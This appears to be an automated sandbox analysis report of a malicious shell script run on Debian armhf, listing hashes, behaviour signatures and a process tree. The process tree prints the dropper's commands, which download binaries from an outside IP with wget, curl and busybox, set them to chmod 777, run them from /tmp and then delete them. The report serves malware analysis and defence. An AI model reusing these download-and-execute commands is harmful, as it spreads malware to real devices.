Analysis
-
max time kernel
21s -
max time network
47s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/11/2024, 05:23
Static task
static1
Behavioral task
behavioral1
Sample
64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh
-
Size
10KB
-
MD5
7d4915a02bbc4a1ae7b70fed6d3293c1
-
SHA1
b164b6db9f2e8375942f65d81fdbee4d41650560
-
SHA256
64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926
-
SHA512
6830a2ff2527d337e1e6b83939662fb92e363729989c13b85ad949521942da0b5acfade63e558e549f074167b1367ba6ae1d980f9217d63cc670c0d53ed0ce28
-
SSDEEP
192:jrE/uXvn65QyKeioEWfPDt92igPn12igPnA/WXvn65QjeiojPDv:jrE2Xvn6uymWp92igPn12igPnAeXvn61
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 6 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 744 chmod 766 chmod 772 chmod 778 chmod 784 chmod 790 chmod -
Executes dropped EXE 6 IoCs
ioc pid Process /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM 745 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE 767 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ 773 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik 779 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq 785 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN 791 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN -
Checks CPU configuration 1 TTPs 6 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM curl File opened for modification /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE curl File opened for modification /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ curl File opened for modification /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik curl File opened for modification /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq curl File opened for modification /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN curl
Processes
-
/tmp/64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh/tmp/64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh1⤵PID:650
-
/bin/rm/bin/rm bins.sh2⤵PID:652
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:681
-
-
/bin/chmodchmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:746
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:747
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:763
-
-
/bin/chmodchmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:768
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:769
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:771
-
-
/bin/chmodchmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:774
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:775
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:777
-
-
/bin/chmodchmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:780
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:781
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:782
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:783
-
-
/bin/chmodchmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:786
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:787
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:789
-
-
/bin/chmodchmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:792
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵PID:793
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵PID:794
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97